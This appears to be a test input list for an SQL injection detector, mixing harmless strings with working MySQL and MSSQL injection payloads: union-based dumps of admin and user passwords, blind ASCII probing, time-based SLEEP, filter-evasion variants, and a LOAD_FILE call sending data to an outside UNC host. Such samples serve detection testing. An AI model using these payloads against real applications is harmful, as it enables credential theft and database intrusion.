hello
233
3'
3 order by 1/*
3 order by 2/*
3 order by 3/*
3 order by 4/*
3 order by 5/*
3 union all select 1,2,3,4/*
3 union all select 1,2,3,4--
3 union all select 1,2,@@version,4/*
3 union all select 1,2,password,4,5 from admin/*
3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*
3 and 1=1
3 and 1=2
3 and substring(@@version,1,1)=4
3 and substsubstringring(@@versversionion,1,1)=4
3 and substring(@@version,1,1)=5
3 and (select 1)=1 
3 and (select 1 from mysql.user limit 0,1)=1
3 and (select 1 from users limit 0,1)=1
3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
' and (select substr(group_concat(pass),1,1) from users)='a
-99 OR IF((ASCII(MID((select id from tb_users),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
-99 OR (SELECT LOAD_FILE(concat('\\\\',(select id from tb_users), 'sec.cuc.edu.cn\\')))
-99 OR (SELECT id from tb_users INTO OUTFILE '\\\\tmp\\share\\output.txt')
1 OR 2-1=0
areyouok
mamashuotebiechangdeparamshouldbemaliciousisnotalwaysright
mamashuo'tebiechangdeparamshouldbemaliciousisnotalwaysright
1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 75>(select top 1 ascii(substring(name,1,1)) from sysusers) 
